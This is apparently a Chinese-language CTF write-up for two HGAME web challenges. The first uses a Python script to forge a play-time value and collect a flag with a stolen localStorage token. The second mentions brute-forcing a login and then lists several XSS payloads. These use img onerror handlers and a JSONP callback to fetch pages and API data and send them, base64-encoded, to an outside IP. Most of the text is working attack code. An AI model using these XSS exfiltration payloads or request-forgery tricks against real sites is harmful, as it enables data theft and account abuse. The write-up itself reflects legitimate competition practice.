web

魔理沙的魔法目录

ai分析js，先拿到用户名与token

1
2


localStorage.getItem('ctf_user')
localStorage.getItem('ctf_token')

然后直接写代码传time超过3600就行

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


import requests

# 替换为你实际拿到的基础URL和Token
target = "http://cloud-big.hgame.vidar.club:31403"
token = "4578fe36-be89-46b2-8a5c-f61991e6f8ac" # 之前console拿到的
username = "player_75506" # 之前console拿到的

headers = {
    "Authorization": token,
    "Content-Type": "application/json"
}

# 直接告诉后端：我已经挂机了 1000000 秒
payload = {
    "username": username,
    "time": 1000000,
    "status": "success" # status 字段是代码中出现的备选字段
}

print("[*] 正在尝试瞬间刷时长...")
requests.post(f"{target}/record", json=payload, headers=headers)

print("[*] 正在领取 Flag...")
r = requests.get(f"{target}/check", headers=headers)
print(f"[!] 结果: {r.text}")

博丽神社的绘马挂

一个登入框，直接爆破

1

adminstrator/root

1

<img src=x onerror="fetch('/archives.html').then(r=>r.text()).then(t=>new Image().src='http://101.200.39.193:5000/log?f='+btoa(encodeURIComponent(t)))">

1

<img src=x onerror="fetch('/api/archives').then(r=>r.text()).then(t=>new Image().src='http://101.200.39.193:5000/flag?f='+btoa(t))">

1

<img src=x onerror="fetch('/api/search?q=hgame').then(r=>r.text()).then(t=>new Image().src='http://101.200.39.193:5000/res?f='+btoa(t))">

1

<img src=x onerror="new Image().src='http://101.200.39.193:5000/ping';window.rd=d=>{new Image().src='http://101.200.39.193:5000/flag?f='+btoa(encodeURIComponent(JSON.stringify(d)))};var s=document.createElement('script');s.src='/api/search?q=&callback=rd';document.body.appendChild(s);">

1

<img src=x onerror="window.rd=d=>{var s=JSON.stringify(d);var b=btoa(unescape(encodeURIComponent(s)));new Image().src='http://101.200.39.193:5000/flag?f='+b};var s=document.createElement('script');s.src='/api/search?q=&callback=rd';document.body.appendChild(s);">

1

<script src="1">